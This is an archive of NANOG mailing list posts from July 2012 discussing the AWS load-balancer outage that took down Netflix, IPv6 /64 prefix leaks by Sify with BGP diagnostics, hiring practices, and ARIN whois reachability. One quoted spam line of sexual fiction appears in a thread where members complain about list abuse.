From steve at pirk.com Sun Jul 8 19:27:11 2012 From: steve at pirk.com (steve pirk [egrep]) Date: Sun, 8 Jul 2012 17:27:11 -0700 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: On Tue, Jul 3, 2012 at 1:00 PM, Ryan Malayter wrote: > Doing it the right way makes the cloud far less cost-effective and far > less "agile". Once you get it all set up just so, change becomes very > difficult. All the monitoring and fail-over/fail-back operations are > generally application-specific and provider-specific, so there's a lot > of lock-in. Tools like RightScale are a step in the right direction, > but don't really touch the application layer. You also have to worry > about the availability of yet another provider! > I am pretty sure Netflix and others were "trying to do it right", as they all had graceful fail-over to a secondary AWS zone defined. It looks to me like Amazon uses DNS round-robin to load balance the zones, because they mention returning a "list" of addresses for DNS queries, and explains the failure of the services to shunt over to other zones in their postmortem. > Elastic Load Balancers (ELBs) allow web traffic directed at a single IP > address to be spread across many EC2 instances. They are a tool for high > availability as traffic to a single end-point can be handled by many > redundant servers. ELBs live in individual Availability Zones and front EC2 > instances in those same zones or in other Availability Zones. > ELBs can also be deployed in multiple Availability Zones. In this > configuration, each Availability Zone's end-point will have a separate IP > address. A single Domain Name will point to all of the end-points' IP > addresses. When a client, such as a web browser, queries DNS with a Domain > Name, it receives the IP address ("A") records of all of the ELBs in random > order. 
While some clients only process a single IP address, many (such as > newer versions of web-browsers) will retry the subsequent IP addresses if > they fail to connect to the first. A large number of non-browser clients > only operate with a single IP address. > During the disruption this past Friday night, the control plane (which > encompasses calls to add a new ELB, scale an ELB, add EC2 instances to an > ELB, and remove traffic from ELBs) began performing traffic shifts to > account for the loss of load balancers in the affected Availability Zone. > As the power and systems returned, a large number of ELBs came up in a > state which triggered a bug we hadn't seen before. The bug caused the ELB > control plane to attempt to scale these ELBs to larger ELB instance sizes. > This resulted in a sudden flood of requests which began to backlog the > control plane. At the same time, customers began launching new EC2 > instances to replace capacity lost in the impacted Availability Zone, > requesting the instances be added to existing load balancers in the other > zones. These requests further increased the ELB control plane backlog. > Because the ELB control plane currently manages requests for the US East-1 > Region through a shared queue, it fell increasingly behind in processing > these requests; and pretty soon, these requests started taking a very long > time to complete. > http://aws.amazon.com/message/67457/ > *In reality, though, Amazon data centers have outages all the time. In > fact, Amazon tells its customers to plan for this to happen, and to be > ready to roll over to a new data center whenever there's an outage.* > > *That's what was supposed to happen at Netflix Friday night. But it > didn't work out that way. 
According to Twitter messages from Netflix > Director of Cloud Architecture Adrian Cockcroft and Instagram Engineer Rick > Branson, it looks like an Amazon Elastic Load Balancing service, designed > to spread Netflix's processing loads across data centers, failed during the > outage. Without that ELB service working properly, the Netflix and Pinterest > services hosted by Amazon crashed.* http://www.wired.com/wiredenterprise/2012/06/real-clouds-crush-amazon/ I am a big believer in using hardware to load balance data centers, and not leave it up to software in the data center which might fail. Speaking of services like RightScale, Google announced Compute Engine at Google I/O this year. BuildFax was an early adopter, and they gave it great reviews... http://www.youtube.com/watch?v=LCjSJ778tGU It looks like Google has entered into the VPS market. 'bout time... ;-] http://cloud.google.com/products/compute-engine.html --steve pirk From malayter at gmail.com Sun Jul 8 19:52:47 2012 From: malayter at gmail.com (Ryan Malayter) Date: Sun, 8 Jul 2012 19:52:47 -0500 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: <9E0AF842-7CD8-4A8B-9243-BAEB6738C408@gmail.com> On Jul 8, 2012, at 7:27 PM, "steve pirk [egrep]" wrote: > > I am pretty sure Netflix and others were "trying to do it right", as they all had graceful fail-over to a secondary AWS zone defined. Having a single company as an infrastructure supplier is not "trying to do it right" from an engineering OR business perspective. It's lazy. No matter how many "availability zones" the vendor claims. From me at anuragbhatia.com Mon Jul 9 01:17:54 2012 From: me at anuragbhatia.com (Anurag Bhatia) Date: Mon, 9 Jul 2012 11:47:54 +0530 Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? Message-ID: Hello everyone I was just looking around and saw a major Indian provider Sify (AS9583) is announcing /64s via BGP along with main /32 which is their allocation from APNIC. 
inet6num: 2001:0E48::/32 netname: SILNET descr: Sify Limited descr: Value Added Network service provider country: IN admin-c: HS51-AP tech-c: HS51-AP status: ALLOCATED PORTABLE mnt-by: APNIC-HM mnt-lower: MAINT-IN-SIFY changed: hm-changed at apnic.net 20040211 changed: hm-changed at apnic.net 20060117 source: APNIC As per IPv6 prefixes announced by AS9583 via bgp.he.net - http://bgp.he.net/AS9583#_prefixes6 we can see multiple /64s. Prefix Description 2001:0e48::/32 Sify Limited [image: India] 2001:0e48:0000:0001::/64 Sify Limited [image: India] 2001:0e48:0000:0002::/64 Sify Limited [image: India] 2001:0e48:0000:0004::/64 Sify Limited [image: India] I see Tata Comm (Sify's upstream) is accepting /64s while Tinet (one of other upstream) is dropping and taking only /32. Other major backbones like HE, Level3 dropping but Telia still accepting. Pretty much mixed result. Is it simply a misconfiguration or there is some use of announcing /64s along with main /32? Thanks. -- Anurag Bhatia Web: anuragbhatia.com Skype: anuragbhatia.com Linkedin | Twitter| Google+ From graham at apolix.co.za Mon Jul 9 02:04:19 2012 From: graham at apolix.co.za (Graham Beneke) Date: Mon, 09 Jul 2012 09:04:19 +0200 Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: References: Message-ID: <4FFA8273.5060308@apolix.co.za> On 09/07/2012 08:17, Anurag Bhatia wrote: > I was just looking around and saw a major Indian provider Sify (AS9583) is > announcing /64s via BGP along with main /32 which is their allocation from > APNIC. > > inet6num: 2001:0E48::/32 > netname: SILNET > > I see Tata Comm (Sify's upstream) is accepting /64s while Tinet (one of > other upstream) is dropping and taking only /32. Other major backbones like > HE, Level3 dropping but Telia still accepting. Pretty much mixed result. > > Is it simply a misconfiguration or there is some use of announcing /64s > along with main /32? I would hope it's accidental. 
Most people I've spoken to won't even consider accepting longer prefixes than /48 and will typically also refuse to accept any prefixes where there are aggregate announces covering them. We're going to end up with a very nasty routing table if people start pumping all their /64s into it. -- Graham Beneke From aftab.siddiqui at gmail.com Mon Jul 9 02:09:13 2012 From: aftab.siddiqui at gmail.com (Aftab Siddiqui) Date: Mon, 9 Jul 2012 12:09:13 +0500 Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: References: Message-ID: > > > > As per IPv6 prefixes announced by AS9583 via bgp.he.net - > http://bgp.he.net/AS9583#_prefixes6 we can see multiple /64s. > > The question is why their upstreams are accepting /64? It shouldn't be at all otherwise just imagine how many /64s you have to deal with once IPv6 is in full swing. Regards, Aftab A. Siddiqui From joelja at bogus.com Mon Jul 9 02:45:39 2012 From: joelja at bogus.com (Joel jaeggli) Date: Mon, 09 Jul 2012 00:45:39 -0700 Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: References: Message-ID: <4FFA8C23.6080501@bogus.com> On 7/9/12 00:09 , Aftab Siddiqui wrote: >> >> >> >> As per IPv6 prefixes announced by AS9583 via bgp.he.net - >> http://bgp.he.net/AS9583#_prefixes6 we can see multiple /64s. you likely won't see them in your table though. >> > The question is why their upstreams are accepting /64? It shouldn't be at > all otherwise just imagine how many /64s you have to deal with once IPv6 > is in full swing. that vantage point of the collector is germane here since if there are more specifics either filtered or no export those routes might appear from the vantage point of an upstream (where the collector is used) but not elsewhere: so consider the cidr report 9583 SIFY-AS-IN Sify Limited Adjacency: 7 Upstream: 5 Downstream: 2 Upstream Adjacent AS list AS6939 HURRICANE - Hurricane Electric, Inc. 
AS10026 PACNET Pacnet Global Ltd AS6453 GLOBEINTERNET TATA Communications AS1273 CW Cable and Wireless Worldwide plc AS3257 TINET-BACKBONE Tinet SpA Downstream Adjacent AS list AS45184 DEN-ISP-AS-IN-AP Den Digital Entertainment Pvt. Ltd. AS ISP india AS17825 MAHINDRABT-AS-AP Tech Mahindra Ltd. Software Development Organisation India Announced IPv6 Prefixes Rank AS Type Originate Addr Space (pfx) Transit Addr space (pfx) Description 1337 AS9583 ORG+TRN Originate: 4294967296 /32.00 Transit: 131073 /47.00 SIFY-AS-IN Sify Limited Aggregation Suggestions This report does not take into account conditions local to each origin AS in terms of policy or traffic engineering requirements, so this is an approximate guideline as to aggregation possibilities. Rank AS AS Name Current Wthdw Aggte Annce Redctn % 1448 AS9583 SIFY-AS-IN Sify Limited 1 0 0 1 0 0.00% Prefix AS Path Aggregation Suggestion 2001:e48::/32 5539 1273 9583 and ask yourself are they really leaking /64s into the DFZ which are being accepted (they aren't) or do they have an adjacency with he.net [jjaeggli at net-oob1.ca2 ~]$ telnet route-views6.routeviews.org Trying 128.223.51.112... Connected to route-views6.routeviews.org (128.223.51.112). Escape character is '^]'. route-views6.routeviews.org> show ipv6 bgp 2001:0e48:0000:0001::/64 % Network not in table route-views6.routeviews.org> route-views6.routeviews.org> show ipv6 bgp 2001:0e48::/32 longer-prefixes BGP table version is 0, local router ID is 128.223.51.112 Status codes: s suppressed, d damped, h history, * valid, > best, i - internal, r RIB-failure, S Stale, R Removed Origin codes: i - IGP, e - EGP, ? 
- incomplete Network Next Hop Metric LocPrf Weight Path * 2001:e48::/32 2001:4810::1 0 33437 29748 6939 7473 9583 i * 2600:803::15 0 701 3549 9583 i * 2001:4830::5 361 0 30071 3549 9583 i * 2001:4830::e 0 0 30071 6453 9583 i * 2001:428::205:171:203:140 8000029 0 209 10026 9583 i * 2001:428::205:171:203:141 8000919 0 209 174 9583 i * 2001:428::205:171:203:138 8000051 0 209 3257 9583 i * 2607:4200:10::3 0 19214 12989 6939 10026 9583 i * 2607:4200:10::2 0 19214 12989 6939 10026 9583 i * 2001:200:901::5 0 7660 4635 10026 9583 i * 2001:418:0:1000::f002 1 0 2914 3257 9583 i * 2001:418:0:1000::f000 0 0 2914 174 9583 i * 2001:1890:111d::1 0 7018 174 9583 i * 2001:1620:1::203 1 0 13030 3257 9583 i * 2001:470:0:1a::1 0 6939 10026 9583 i *> 2001:668:0:4::2 10 0 3257 9583 i * 2001:240:100:ff::2497:2 0 2497 10026 9583 i * 2610:38:1::1 0 7781 6939 7473 9583 i Total number of prefixes 1 > Regards, > > Aftab A. Siddiqui > From geier at geier.ne.tz Mon Jul 9 03:13:42 2012 From: geier at geier.ne.tz (Frank Habicht) Date: Mon, 09 Jul 2012 11:13:42 +0300 Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: <4FFA8C23.6080501@bogus.com> References: <4FFA8C23.6080501@bogus.com> Message-ID: <4FFA92B6.9050400@geier.ne.tz> On 7/9/2012 10:45 AM, Joel jaeggli wrote: > On 7/9/12 00:09 , Aftab Siddiqui wrote: >>> >>> As per IPv6 prefixes announced by AS9583 via bgp.he.net - >>> http://bgp.he.net/AS9583#_prefixes6 we can see multiple /64s. > > you likely won't see them in your table though. as direct customer of 6453 I see them. :-( before starting to filter. 6453: will you filter them? Frank #sh bgp ipv6 u 2001:0E48::/32 lo BGP table version is 2543917, local router ID is 41.188.128.35 Status codes: s suppressed, d damped, h history, * valid, > best, i - internal, r RIB-failure, S Stale, m multipath, b backup-path, x best-external, f RT-Filter, a additional-path Origin codes: i - IGP, e - EGP, ? 
- incomplete Network Next Hop Metric LocPrf Weight Path *>i2001:E48::/32 2001:5A0:C00:400::5 0 30 0 6453 9583 i *>i2001:E48:0:1::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? *>i2001:E48:0:2::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? *>i2001:E48:0:4::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? *>i2001:E48:0:5::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? *>i2001:E48:0:6::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? *>i2001:E48:0:7::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? *>i2001:E48:0:8::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? From gb10hkzo-nanog at yahoo.co.uk Mon Jul 9 06:42:29 2012 From: gb10hkzo-nanog at yahoo.co.uk (gb10hkzo-nanog at yahoo.co.uk) Date: Mon, 9 Jul 2012 12:42:29 +0100 (BST) Subject: FYI Netflix is down Message-ID: <1341834149.51473.YahooMailNeo@web29403.mail.ird.yahoo.com> Steve at pirk, I fail to grasp the concept in your argument. You do realise, do you not, that your $$$$$ black boxes from your favourite brand name vendor have software running inside of them do you not ? Case in point for example, the recent LINX issues.... it wasn't the hardware that gave them the headaches, but the software running on it sure did ! >I am a big believer in using hardware to load balance data centers, and not >leave it up to software in the data center which might fail. From ahebert at pubnix.net Mon Jul 9 07:07:14 2012 From: ahebert at pubnix.net (Alain Hebert) Date: Mon, 09 Jul 2012 08:07:14 -0400 Subject: FYI Netflix is down In-Reply-To: <1341834149.51473.YahooMailNeo@web29403.mail.ird.yahoo.com> References: <1341834149.51473.YahooMailNeo@web29403.mail.ird.yahoo.com> Message-ID: <4FFAC972.5020402@pubnix.net> Hi, Well depending on your "black box", your mileage will vary. Their wide use of ASIC eliminates a lot of the headache of pure software implementation. Buffer, timing, expected results, etc. Their "real" software only represents a small part of the device and is mostly relegated to management and some L4 to L7 handling. 
So yes, ASIC/FPGA devices have "software", but their result and behavior are predictable and the system is more stable because of it. PS: Yes, CAM lockout, bad RAM is still a pita for them. In short: It is quite a thing to say that because everything can be categorized as "software" that someone's point is invalid. ----- Alain Hebert ahebert at pubnix.net PubNIX Inc. 50 boul. St-Charles P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 On 07/09/12 07:42, gb10hkzo-nanog at yahoo.co.uk wrote: > Steve at pirk, > > I fail to grasp the concept in your argument. > > You do realise, do you not, that your $$$$$ black boxes from your favourite brand name vendor have software running inside of them do you not ? > > Case in point for example, the recent LINX issues.... it wasn't the hardware that gave them the headaches, but the software running on it sure did ! > >> I am a big believer in using hardware to load balance data centers, and not >> leave it up to software in the data center which might fail. > From valdis.kletnieks at vt.edu Mon Jul 9 08:08:00 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Mon, 09 Jul 2012 09:08:00 -0400 Subject: FYI Netflix is down In-Reply-To: Your message of "Mon, 09 Jul 2012 08:07:14 -0400." <4FFAC972.5020402@pubnix.net> References: <1341834149.51473.YahooMailNeo@web29403.mail.ird.yahoo.com> <4FFAC972.5020402@pubnix.net> Message-ID: <201923.1341839280@turing-police.cc.vt.edu> On Mon, 09 Jul 2012 08:07:14 -0400, Alain Hebert said: > Their wide use of ASIC eliminates a lot of the headache of pure > software implementation. And gets you, in return, the headaches of buggy hardware, where bug-fixing is just a bit harder than "load the new release". ;) 
From streiner at cluebyfour.org Mon Jul 9 10:12:16 2012 From: streiner at cluebyfour.org (Justin M. Streiner) Date: Mon, 9 Jul 2012 11:12:16 -0400 (EDT) Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: References: Message-ID: On Mon, 9 Jul 2012, Anurag Bhatia wrote: > I was just looking around and saw a major Indian provider Sify (AS9583) is > announcing /64s via BGP along with main /32 which is their allocation from > APNIC. [snip] > Is it simply a misconfiguration or there is some use of announcing /64s > along with main /32? Most of the major carriers I've seen appear to have settled on /48 as the smallest IPv6 prefix they will accept, much like /24 is the smallest IPv4 prefix that most providers will accept. Anything smaller runs the risk of mixed degrees of acceptance. As long as the /64 is part of a larger parent block, there shouldn't be any total loss of connectivity, however the routing to one of those /64 sites could be sub-optimal. Advertising /64s into the global routing table is bad mojo. jms From streiner at cluebyfour.org Mon Jul 9 10:16:36 2012 From: streiner at cluebyfour.org (Justin M. Streiner) Date: Mon, 9 Jul 2012 11:16:36 -0400 (EDT) Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: References: Message-ID: On Mon, 9 Jul 2012, Anurag Bhatia wrote: > I was just looking around and saw a major Indian provider Sify (AS9583) is > announcing /64s via BGP along with main /32 which is their allocation from > APNIC. > inet6num: 2001:0E48::/32 I only see 2001:e48::/32 in my view of the v6 routing table. If any of my upstream providers don't drop anything smaller than a /48, I do... 
jms From raysonlogin at gmail.com Mon Jul 9 10:50:06 2012 From: raysonlogin at gmail.com (Rayson Ho) Date: Mon, 9 Jul 2012 11:50:06 -0400 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: On Sun, Jul 8, 2012 at 8:27 PM, steve pirk [egrep] wrote: > I am pretty sure Netflix and others were "trying to do it right", as they > all had graceful fail-over to a secondary AWS zone defined. > It looks to me like Amazon uses DNS round-robin to load balance the zones, > because they mention returning a "list" of addresses for DNS queries, and > explains the failure of the services to shunt over to other zones in their > postmortem. There are also bugs from the Netflix side uncovered by the AWS outage: "Lessons Netflix Learned from the AWS Storm" http://techblog.netflix.com/2012/07/lessons-netflix-learned-from-aws-storm.html For an infrastructure this large, no matter whether you are running your own datacenter or using the cloud, it is certain that the code is not bug free. And another thing is, if everything is too automated, then failure in one component can trigger bugs in areas that no one has ever thought of... Rayson ================================================== Open Grid Scheduler - The Official Open Source Grid Engine http://gridscheduler.sourceforge.net/ >> Elastic Load Balancers (ELBs) allow web traffic directed at a single IP >> address to be spread across many EC2 instances. They are a tool for high >> availability as traffic to a single end-point can be handled by many >> redundant servers. ELBs live in individual Availability Zones and front EC2 >> instances in those same zones or in other Availability Zones. > > > >> ELBs can also be deployed in multiple Availability Zones. In this >> configuration, each Availability Zone's end-point will have a separate IP >> address. A single Domain Name will point to all of the end-points' IP >> addresses. When a client, such as a web browser, queries DNS with a Domain >> Name, it receives the IP address ("A") 
records of all of the ELBs in random >> order. While some clients only process a single IP address, many (such as >> newer versions of web-browsers) will retry the subsequent IP addresses if >> they fail to connect to the first. A large number of non-browser clients >> only operate with a single IP address. >> During the disruption this past Friday night, the control plane (which >> encompasses calls to add a new ELB, scale an ELB, add EC2 instances to an >> ELB, and remove traffic from ELBs) began performing traffic shifts to >> account for the loss of load balancers in the affected Availability Zone. >> As the power and systems returned, a large number of ELBs came up in a >> state which triggered a bug we hadn't seen before. The bug caused the ELB >> control plane to attempt to scale these ELBs to larger ELB instance sizes. >> This resulted in a sudden flood of requests which began to backlog the >> control plane. At the same time, customers began launching new EC2 >> instances to replace capacity lost in the impacted Availability Zone, >> requesting the instances be added to existing load balancers in the other >> zones. These requests further increased the ELB control plane backlog. >> Because the ELB control plane currently manages requests for the US East-1 >> Region through a shared queue, it fell increasingly behind in processing >> these requests; and pretty soon, these requests started taking a very long >> time to complete. >> > http://aws.amazon.com/message/67457/ > > >> *In reality, though, Amazon data centers have outages all the time. In >> fact, Amazon tells its customers to plan for this to happen, and to be >> ready to roll over to a new data center whenever there's an outage.* >> >> *That's what was supposed to happen at Netflix Friday night. But it >> didn't work out that way. 
According to Twitter messages from Netflix >> Director of Cloud Architecture Adrian Cockcroft and Instagram Engineer Rick >> Branson, it looks like an Amazon Elastic Load Balancing service, designed >> to spread Netflix's processing loads across data centers, failed during the >> outage. Without that ELB service working properly, the Netflix and Pinterest >> services hosted by Amazon crashed.* > > http://www.wired.com/wiredenterprise/2012/06/real-clouds-crush-amazon/ > > I am a big believer in using hardware to load balance data centers, and not > leave it up to software in the data center which might fail. > > Speaking of services like RightScale, Google announced Compute Engine at > Google I/O this year. BuildFax was an early adopter, and they gave it great > reviews... > http://www.youtube.com/watch?v=LCjSJ778tGU > > It looks like Google has entered into the VPS market. 'bout time... ;-] > http://cloud.google.com/products/compute-engine.html > > --steve pirk From mikea at mikea.ath.cx Mon Jul 9 10:57:57 2012 From: mikea at mikea.ath.cx (Mike Andrews) Date: Mon, 9 Jul 2012 10:57:57 -0500 Subject: job screening question In-Reply-To: References: <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> Message-ID: <20120709155757.GA55453@mikea.ath.cx> On Fri, Jul 06, 2012 at 09:36:47PM -0400, William Herrin wrote: > On Fri, Jul 6, 2012 at 9:22 PM, Steven Noble wrote: > > I have talked to companies who have job openings many > > months old for people who absolutely exist in the silicon > > valley. The hiring company just thinks the people who > > apply are over or under qualified. > > I thought someone was overqualified once. My decision was overridden. > I turned out to be very glad it was. He didn't fit the role I thought > I needed but I was able to turn him loose with minimal supervision. > And I was able to go on vacation. :) That was so much more valuable. 
I've seen people turned away for being "overqualified", when I would have hired them in a heartbeat. The HR types seem unable to comprehend that "overqualified" is not a bad thing, especially in the current economic climate, and that it includes "qualified". Being able to bring someone in and then take vacation time without having to worry about things going casters-up is very valuable indeed. > Now I know: tell the candidate about the work, all the work not just > the job you thought you would hire for, and let him tell you whether > any of it is beneath him. As long as you get all the skills you need > on the team you can juggle the tasking. Unless you have a policy that "Slot A only does Slot A work" stuffed up some orifice. I've been there, and it is both stultifying and limiting. -- Mike Andrews, W5EGO mikea at mikea.ath.cx Tired old sysadmin From ispbuilder at gmail.com Mon Jul 9 11:01:31 2012 From: ispbuilder at gmail.com (Mike) Date: Mon, 09 Jul 2012 13:01:31 -0300 Subject: job screening question In-Reply-To: <20120709155757.GA55453@mikea.ath.cx> References: <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> <20120709155757.GA55453@mikea.ath.cx> Message-ID: <4FFB005B.6060703@gmail.com> On 12-07-09 12:57 PM, Mike Andrews wrote: > Unless you have a policy that "Slot A only does Slot A work" stuffed > up some orifice. I've been there, and it is both stultifying and > limiting. Further to the above wisdom, if you truly care about your work it will either drive you crazy as you force yourself to fix things that aren't your problem, or as you start to force yourself not to care about someone else's crappy work. -- Looking for (employment|contract) work in the Internet industry, preferably working remotely. Building / Supporting the net since 2400 baud was the hot thing. Ask for a resume! 
ispbuilder at gmail.com From davehart at gmail.com Mon Jul 9 12:20:21 2012 From: davehart at gmail.com (Dave Hart) Date: Mon, 9 Jul 2012 17:20:21 +0000 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: On Mon, Jul 9, 2012 at 15:50 UTC, Rayson Ho wrote: > There are also bugs from the Netflix side uncovered by the AWS outage: > > "Lessons Netflix Learned from the AWS Storm" > > http://techblog.netflix.com/2012/07/lessons-netflix-learned-from-aws-storm.html "We continue to investigate why these connections were timing out during connect, rather than quickly determining that there was no route to the unavailable hosts and failing quickly." potential translation: "We continue to shoot ourselves in the foot by filtering all ICMP without understanding the implications." Cheers, Dave Hart
From DHyde at hosting.com Mon Jul 9 12:47:27 2012 From: DHyde at hosting.com (Darrell Hyde) Date: Mon, 9 Jul 2012 13:47:27 -0400 Subject: Carrier assistance Message-ID: <1AA11A6BC714D944985F3BC7FF7AB35F64A5E78E2A@MBX03.corp.safesecureweb.com> Could anyone from Qwest/CenturyLink, TW Telecom, or XO with the ability to assist with some null routing please drop me a line off-list? Got a customer getting attacked in one of my sites and our calls are languishing in hold queues. Thanks in advance, - Darrell
From nanog195 at yahoo.com Mon Jul 9 15:13:33 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Mon, 9 Jul 2012 13:13:33 -0700 (PDT) Subject: Carrier assistance In-Reply-To: <1AA11A6BC714D944985F3BC7FF7AB35F64A5E78E2A@MBX03.corp.safesecureweb.com> References: <1AA11A6BC714D944985F3BC7FF7AB35F64A5E78E2A@MBX03.corp.safesecureweb.com> Message-ID: <1341864813.86295.YahooMailNeo@web142506.mail.bf1.yahoo.com>
From nanog195 at yahoo.com Mon Jul 9 15:14:38 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Mon, 9 Jul 2012 13:14:38 -0700 (PDT) Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: References: Message-ID: <1341864878.42779.YahooMailNeo@web142505.mail.bf1.yahoo.com>
From jason at thebaughers.com Mon Jul 9 15:24:27 2012 From: jason at thebaughers.com (Jason Baugher) Date: Mon, 09 Jul 2012 15:24:27 -0500 Subject: Carrier assistance In-Reply-To: <1341864813.86295.YahooMailNeo@web142506.mail.bf1.yahoo.com> References: <1AA11A6BC714D944985F3BC7FF7AB35F64A5E78E2A@MBX03.corp.safesecureweb.com> <1341864813.86295.YahooMailNeo@web142506.mail.bf1.yahoo.com> Message-ID: <4FFB3DFB.9000502@thebaughers.com> What's with the porn lately? On 7/9/2012 3:13 PM, NIG NOG wrote: > > Diane spent a few more seconds over by the dresser before turning back around, condom in hand and already unwrapped.
> From jgreco at ns.sol.net Mon Jul 9 14:27:18 2012 From: jgreco at ns.sol.net (Joe Greco) Date: Mon, 9 Jul 2012 14:27:18 -0500 (CDT) Subject: Carrier assistance In-Reply-To: <4FFB3DFB.9000502@thebaughers.com> Message-ID: <201207091927.q69JRJv4057207@aurora.sol.net> > What's with the porn lately? > > On 7/9/2012 3:13 PM, NIG NOG wrote: > > > > Diane spent a few more seconds over by the dresser before turning back around, condom in hand and already unwrapped. Probably someone trying to bring attention to the abuse problems Y! has lately. ... JG -- Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net "We call it the 'one bite at the apple' rule. Give me one chance [and] then I won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN) With 24 million small businesses in the US alone, that's way too many apples. From marine64 at gmail.com Mon Jul 9 16:07:54 2012 From: marine64 at gmail.com (Brian Henson) Date: Mon, 9 Jul 2012 17:07:54 -0400 Subject: Carrier assistance In-Reply-To: <201207091927.q69JRJv4057207@aurora.sol.net> References: <4FFB3DFB.9000502@thebaughers.com> <201207091927.q69JRJv4057207@aurora.sol.net> Message-ID: can we please ban his email from the list? On Mon, Jul 9, 2012 at 3:27 PM, Joe Greco wrote: > > What's with the porn lately? > > > > On 7/9/2012 3:13 PM, NIG NOG wrote: > > > > > > Diane spent a few more seconds over by the dresser before turning back > around, condom in hand and already unwrapped. > > Probably someone trying to bring attention to the abuse problems Y! > has lately. > > ... JG > -- > Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net > "We call it the 'one bite at the apple' rule. Give me one chance [and] > then I > won't contact you again." - Direct Marketing Ass'n position on e-mail > spam(CNN) > With 24 million small businesses in the US alone, that's way too many > apples. 
> > From dhubbard at dino.hostasaurus.com Mon Jul 9 18:48:31 2012 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Mon, 9 Jul 2012 19:48:31 -0400 Subject: arin ipv6 whois working for you? Message-ID: I want to make sure it's not just me but I'm not seeing a bgp route from my upstreams to networks with the addresses they're advertising: ;; ANSWER SECTION: whois.arin.net. 274 IN AAAA 2001:500:13::48 whois.arin.net. 274 IN AAAA 2001:500:13::46 whois.arin.net. 274 IN AAAA 2001:500:13::47 Thanks, Dave From ops.lists at gmail.com Mon Jul 9 19:00:34 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Tue, 10 Jul 2012 05:30:34 +0530 Subject: arin ipv6 whois working for you? In-Reply-To: References: Message-ID: works for me suresh at frodo 16:59:51 :~$ whois -h 2001:500:13::46 204.74.68.40 # # Query terms are ambiguous. The query is assumed to be: # "n 204.74.68.40" # # Use "?" to get help. # # # The following results may also be obtained via: # http://whois.arin.net/rest/nets;q=204.74.68.40?showDetails=true&showARIN=false&ext=netref2 # On Tue, Jul 10, 2012 at 5:18 AM, David Hubbard wrote: > I want to make sure it's not just me but I'm not > seeing a bgp route from my upstreams to networks > with the addresses they're advertising: > > ;; ANSWER SECTION: > whois.arin.net. 274 IN AAAA 2001:500:13::48 > whois.arin.net. 274 IN AAAA 2001:500:13::46 > whois.arin.net. 274 IN AAAA 2001:500:13::47 -- Suresh Ramasubramanian (ops.lists at gmail.com) From dhubbard at dino.hostasaurus.com Mon Jul 9 19:16:31 2012 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Mon, 9 Jul 2012 20:16:31 -0400 Subject: arin ipv6 whois working for you? References: Message-ID: Sorry, dumb internal route filter issue; problem resolved. :-) David > -----Original Message----- > From: Suresh Ramasubramanian [mailto:ops.lists at gmail.com] > Sent: Monday, July 09, 2012 8:01 PM > To: David Hubbard > Cc: nanog at nanog.org > Subject: Re: arin ipv6 whois working for you? 
> > works for me > > suresh at frodo 16:59:51 :~$ whois -h 2001:500:13::46 204.74.68.40 > # > # Query terms are ambiguous. The query is assumed to be: > # "n 204.74.68.40" > # > # Use "?" to get help. > # > > # > # The following results may also be obtained via: > # > http://whois.arin.net/rest/nets;q=204.74.68.40?showDetails=tru > e&showARIN=false&ext=netref2 > # > > > > On Tue, Jul 10, 2012 at 5:18 AM, David Hubbard > wrote: > > I want to make sure it's not just me but I'm not > > seeing a bgp route from my upstreams to networks > > with the addresses they're advertising: > > > > ;; ANSWER SECTION: > > whois.arin.net. 274 IN AAAA 2001:500:13::48 > > whois.arin.net. 274 IN AAAA 2001:500:13::46 > > whois.arin.net. 274 IN AAAA 2001:500:13::47 > > > > -- > Suresh Ramasubramanian (ops.lists at gmail.com) > > From owen at delong.com Mon Jul 9 19:29:09 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 9 Jul 2012 17:29:09 -0700 Subject: arin ipv6 whois working for you? In-Reply-To: References: Message-ID: I see routes there just fine and can reach the servers from Hurricane Electric (AS6939) and from home (AS1734). Owen On Jul 9, 2012, at 4:48 PM, David Hubbard wrote: > I want to make sure it's not just me but I'm not > seeing a bgp route from my upstreams to networks > with the addresses they're advertising: > > ;; ANSWER SECTION: > whois.arin.net. 274 IN AAAA 2001:500:13::48 > whois.arin.net. 274 IN AAAA 2001:500:13::46 > whois.arin.net. 274 IN AAAA 2001:500:13::47 > > Thanks, > > Dave From william.allen.simpson at gmail.com Mon Jul 9 20:46:51 2012 From: william.allen.simpson at gmail.com (William Allen Simpson) Date: Mon, 09 Jul 2012 21:46:51 -0400 Subject: U.S. spy agencies ... email for cybersecurity Message-ID: <4FFB898B.2000908@gmail.com> Somebody needs to give them a clue-by-four. The private sector already has the "Internet address where an email ... originated"; it's already in the Received lines. 
We don't need to be informed about it, we already inform each other about it.

